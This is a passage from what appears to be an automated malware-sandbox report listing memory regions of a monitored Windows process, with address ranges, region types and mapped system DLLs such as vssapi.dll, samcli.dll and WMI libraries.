end_va = 0x21cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 4245
start_va = 0x21d0000
end_va = 0x236ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 4246
start_va = 0x2370000
end_va = 0x256ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4247
start_va = 0x743e0000
end_va = 0x743e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll"
filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll")
Region:
id = 4248
start_va = 0xa60000
end_va = 0xa8ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll.mui"
filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui")
Region:
id = 4249
start_va = 0x1cf0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 4250
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 4259
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4260
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4261
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4262
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4263
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4264
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4265
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4266
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4267
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4268
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4269
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4270
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4271
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4272
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4273
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4274
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4275
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4276
start_va = 0x7fef8870000
end_va = 0x7fef8877fff
monitored = 0
entry_point = 0x7fef8871020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 4283
start_va = 0x7fef8790000
end_va = 0x7fef87dffff
monitored = 0
entry_point = 0x7fef8791190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 4284
start_va = 0x7fefd710000
end_va = 0x7fefd723fff
monitored = 0
entry_point = 0x7fefd714160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 4285
start_va = 0x7fef8770000
end_va = 0x7fef8788fff
monitored = 0
entry_point = 0x7fef8771104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 4286
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 4287
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 4288
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 4289
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 4290
start_va = 0x2360000
end_va = 0x236ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 4291
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 4292
start_va = 0x1fe0000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 4293
start_va = 0x20c0000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020c0000"
filename = ""
Region:
id = 4294
start_va = 0x2150000
end_va = 0x21cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 4295
start_va = 0x2370000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4296
start_va = 0x24f0000
end_va = 0x256ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 4297
start_va = 0x1cb0000
end_va = 0x1daffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cb0000"
filename = ""
Region:
id = 4298
start_va = 0x2570000
end_va = 0x266ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 4299
start_va = 0x7fefa810000
end_va = 0x7fefa9bffff
monitored = 0
entry_point = 0x7fefa811010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 4300
start_va = 0x7fefa7b0000
end_va = 0x7fefa7c6fff
monitored = 0
entry_point = 0x7fefa7b1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 4301
start_va = 0xa60000
end_va = 0xa67fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 4302
start_va = 0x7fefbd80000
end_va = 0x7fefbd93fff
monitored = 0
entry_point = 0x7fefbd816b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 4303
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 4304
start_va = 0x7fef86e0000
end_va = 0x7fef8763fff
monitored = 0
entry_point = 0x7fef8731118
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 4305
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 4306
start_va = 0x2670000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 4307
start_va = 0x2670000
end_va = 0x276ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 4308
start_va = 0x27f0000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 4309
start_va = 0x2800000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4310
start_va = 0x7fefcf50000
end_va = 0x7fefcf61fff
monitored = 0
entry_point = 0x7fefcf51060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 4311
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4312
start_va = 0x2970000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 4313
start_va = 0x2020000
end_va = 0x209ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 4314
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 4315
start_va = 0x7fef83e0000
end_va = 0x7fef83f9fff
monitored = 0
entry_point = 0x7fef83f3fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 4316
start_va = 0x7fef82b0000
end_va = 0x7fef83dbfff
monitored = 0
entry_point = 0x7fef8360ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 4317
start_va = 0x2370000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4318
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 4319
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 4320
start_va = 0x7fef8240000
end_va = 0x7fef82a1fff
monitored = 0
entry_point = 0x7fef827bd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 4321
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4322
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4323
start_va = 0x2980000
end_va = 0x2b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 4324
start_va = 0x29e0000
end_va = 0x2a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 4325
start_va = 0x2aa0000
end_va = 0x2b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002aa0000"
filename = ""
Region:
id = 4326
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 4327
start_va = 0x7fefb020000
end_va = 0x7fefb030fff
monitored = 0
entry_point = 0x7fefb0216ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 4328
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4329
start_va = 0x7fefb000000
end_va = 0x7fefb017fff
monitored = 0
entry_point = 0x7fefb001bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 4330
start_va = 0x2c60000
end_va = 0x2cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 4331
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 4332
start_va = 0x2570000
end_va = 0x25effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 4333
start_va = 0x25f0000
end_va = 0x266ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4334
start_va = 0x7fef80a0000
end_va = 0x7fef818dfff
monitored = 0
entry_point = 0x7fef80a12a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 4335
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 4336
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4337
start_va = 0x2bd0000
end_va = 0x2c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 4338
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 4339
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4348
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4349
start_va = 0x2ce0000
end_va = 0x2eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 4350
start_va = 0x7fefb580000
end_va = 0x7fefb587fff
monitored = 0
entry_point = 0x7fefb581414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 4351
start_va = 0x7fef7c60000
end_va = 0x7fef7ccafff
monitored = 0
entry_point = 0x7fef7ca4344
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 4352
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4353
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 4354
start_va = 0x2e70000
end_va = 0x2eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e70000"
filename = ""
Region:
id = 4355
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 4356
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 4357
start_va = 0x7fef7bd0000
end_va = 0x7fef7c29fff
monitored = 0
entry_point = 0x7fef7c0dde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 4358
start_va = 0x7fef7b50000
end_va = 0x7fef7bc3fff
monitored = 0
entry_point = 0x7fef7b566f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 4359
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4360
start_va = 0x7fef7b40000
end_va = 0x7fef7b4bfff
monitored = 0
entry_point = 0x7fef7b4602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 4361
start_va = 0x2ef0000
end_va = 0x30effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ef0000"
filename = ""
Region:
id = 4363
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4367
start_va = 0x30f0000
end_va = 0x34effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030f0000"
filename = ""
Region:
id = 4368
start_va = 0x3580000
end_va = 0x35fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003580000"
filename = ""
Region:
id = 4369
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 4370
start_va = 0x2b50000
end_va = 0x2bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 4371
start_va = 0x3610000
end_va = 0x368ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 4372
start_va = 0x36a0000
end_va = 0x371ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000036a0000"
filename = ""
Region:
id = 4373
start_va = 0x3830000
end_va = 0x38affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003830000"
filename = ""
Region:
id = 4374
start_va = 0x3960000
end_va = 0x39dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003960000"
filename = ""
Region:
id = 4375
start_va = 0x3a10000
end_va = 0x3a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a10000"
filename = ""
Region:
id = 4376
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 4377
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 4378
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 4379
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 4380
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 4381
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 4390
start_va = 0x3a90000
end_va = 0x428ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a90000"
filename = ""
Region:
id = 4396
start_va = 0x4290000
end_va = 0x525ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004290000"
filename = ""
Region:
id = 4400
start_va = 0x3720000
end_va = 0x381ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003720000"
filename = ""
Region:
id = 4401
start_va = 0x7fef5060000
end_va = 0x7fef5114fff
monitored = 0
entry_point = 0x7fef50dcf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 4407
start_va = 0x7fef5040000
end_va = 0x7fef5051fff
monitored = 0
entry_point = 0x7fef50489d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 4408
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 4409
start_va = 0x3500000
end_va = 0x357ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003500000"
filename = ""
Region:
id = 4410
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 4411
start_va = 0x7fef4f40000
end_va = 0x7fef4fb0fff
monitored = 0
entry_point = 0x7fef4f851d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 4412
start_va = 0x5310000
end_va = 0x538ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 4413
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 4523
start_va = 0x2d30000
end_va = 0x2daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d30000"
filename = ""
Region:
id = 4524
start_va = 0x38e0000
end_va = 0x395ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038e0000"
filename = ""
Region:
id = 4525
start_va = 0x5290000
end_va = 0x530ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 4526
start_va = 0x5440000
end_va = 0x54bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 4527
start_va = 0x54c0000
end_va = 0x553ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000054c0000"
filename = ""
Region:
id = 4528
start_va = 0x5570000
end_va = 0x55effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005570000"
filename = ""
Region:
id = 4529
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 4530
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 4531
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 4532
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 4533
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 4534
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 4563
start_va = 0xde0000
end_va = 0xdf5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000de0000"
filename = ""
Region:
id = 4566
start_va = 0xde0000
end_va = 0xdfbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 4696
start_va = 0xa80000
end_va = 0xa80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a80000"
filename = ""
Region:
id = 4697
start_va = 0x5460000
end_va = 0x54dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 4698
start_va = 0x5530000
end_va = 0x55affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005530000"
filename = ""
Region:
id = 4699
start_va = 0x5290000
end_va = 0x530ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 4700
start_va = 0x5620000
end_va = 0x569ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005620000"
filename = ""
Region:
id = 4701
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 4702
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 4703
start_va = 0x5710000
end_va = 0x578ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005710000"
filename = ""
Region:
id = 4704
start_va = 0x57d0000
end_va = 0x584ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057d0000"
filename = ""
Region:
id = 4705
start_va = 0x7fffff5a000
end_va = 0x7fffff5bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5a000"
filename = ""
Region:
id = 4706
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 4707
start_va = 0x5860000
end_va = 0x58dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005860000"
filename = ""
Region:
id = 4708
start_va = 0x5910000
end_va = 0x598ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005910000"
filename = ""
Region:
id = 4709
start_va = 0x7fffff56000
end_va = 0x7fffff57fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff56000"
filename = ""
Region:
id = 4710
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 4711
start_va = 0x5ac0000
end_va = 0x5b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ac0000"
filename = ""
Region:
id = 4712
start_va = 0x7fffff54000
end_va = 0x7fffff55fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff54000"
filename = ""
Region:
id = 4713
start_va = 0x7fef72f0000
end_va = 0x7fef7306fff
monitored = 0
entry_point = 0x7fef72f9d50
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 4897
start_va = 0x59c0000
end_va = 0x5a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000059c0000"
filename = ""
Region:
id = 4898
start_va = 0x5a40000
end_va = 0x5abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a40000"
filename = ""
Region:
id = 4899
start_va = 0x5b70000
end_va = 0x5beffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b70000"
filename = ""
Region:
id = 4900
start_va = 0x7fffff4e000
end_va = 0x7fffff4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff4e000"
filename = ""
Region:
id = 4901
start_va = 0x7fffff50000
end_va = 0x7fffff51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff50000"
filename = ""
Region:
id = 4902
start_va = 0x7fffff52000
end_va = 0x7fffff53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff52000"
